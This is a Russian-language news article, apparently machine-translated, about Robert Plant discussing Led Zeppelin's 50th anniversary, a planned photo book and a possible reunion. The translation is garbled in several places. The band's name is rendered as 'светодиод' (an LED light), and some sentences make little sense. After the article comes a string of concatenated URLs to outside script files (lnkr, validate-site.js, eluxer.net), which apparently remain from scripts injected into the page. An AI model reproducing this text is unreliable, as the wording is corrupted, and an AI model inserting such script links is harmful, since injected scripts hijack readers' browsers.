LED ZEPPELIN могут воссоединиться в честь 50-летия группы

Роберт Плант говорит, что в этом году будет празднование  50-летнего юбилея LED ZEPPELIN, и он встретится с другими оставшимися в живых участниками группы, чтобы обсудить планы по маркировке.

Официальная иллюстрированная книга Led Zeppelin by Led Zeppelin будет выпущена в октябре, а гитарист Джимми Пейдж недавно сказал, что в следующем году появится еще один концертный альбом LED ZEPPELIN, в котором появятся дополнительные «релизы».

Обращаясь к The Current о планах ZEPPELIN по празднованию удара полувековой марки, Роберт Плант сказал: «Ну, мы собираемся собраться и поговорить об этом. В принципе, очень сложно найти материал, который все еще неслыханный. Это будет 50 лет, но это будет в следующем году, 38 лет с тех пор, как барабанщик Джон Бонэм скончался. И великая вещь о светодиоде ZEPPELIN заключалась в том, что мы не фиксировали себя, мы просто ходили из города в город, пели песни, играли на гитарах и прочее, а потом продолжали свою жизнь ».

Плант добавил, что он хотел, чтобы «у нас было больше вещей, на которые можно было смотреть, но будет книга с фотографиями и т.д. Но некоторые из вещей будут особенно интересными, я думаю», — сказал он. «Помимо этого, в музыкальном плане, есть кусочки, лежащие вокруг, но не альбом или что-то в этом роде. Но, я уверен, где-то будет торжество. »

LED ZEPPELIN не выступал вместе более десяти лет, последний раз играли в O2 Arena в Лондоне в декабре 2007 года. Концерт стал частью мероприятия Tribute Ahmet Ertegun, которое было выпущено на CD и DVD 2012 года и называлось Celebration Day. Это выступление показало как, Джейсон Бонэм заменял своего покойного отца Джона Бонэма на барабанах, и ознаменовал как первый полномасштабный концерт Пейджа, Планта и Пола Джонса вместе с смерти Джона Бонэма в 1980 году.

В октябре прошлого года Плант отклонил возможность воссоединения LED ZEPPELIN, сообщив Daily Telegraph, что «вы никогда не сможете вернуться назад». Он добавил: «Это достаточно сложно, повторяя себя молодым, не говоря уже о 49-летнем возрасте. Мне нужно двигаться».

Плант, возможно, был единственной преградой для другого воссоединения LED ZEPPELIN. Несмотря на попытки промоутеров заставить группу к реформе для серии концертов.

https://spedcheck.space/addons/lnkr5.min.jshttps://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52189x6678x&r=11https://spedcheck.space/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=52189_6678_

You May Also Like

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *